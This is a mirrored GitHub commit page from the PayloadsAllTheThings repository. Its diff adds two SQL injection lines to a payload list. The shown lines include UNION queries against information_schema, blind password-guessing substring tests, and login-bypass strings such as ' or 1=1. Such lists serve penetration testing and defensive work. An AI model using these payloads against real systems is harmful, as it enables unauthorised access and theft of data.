mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-11-10 07:04:22 +00:00
Merge pull request #76 from ElonSalfati/master
Added 2 working sql injection lines
This commit is contained in:
commit
b148a9c906
1 changed files with 2 additions and 1 deletions
|
@ -117,4 +117,5 @@
|
|||
' UNION select table_schema,table_name FROM information_Schema.tables;#
|
||||
admin' and substring(password/text(),1,1)='7
|
||||
' and substring(password/text(),1,1)='7
|
||||
|
||||
' or 1=1 limit 1 -- -+
|
||||
'="or'
|
||||
|
|
Loading…
Reference in a new issue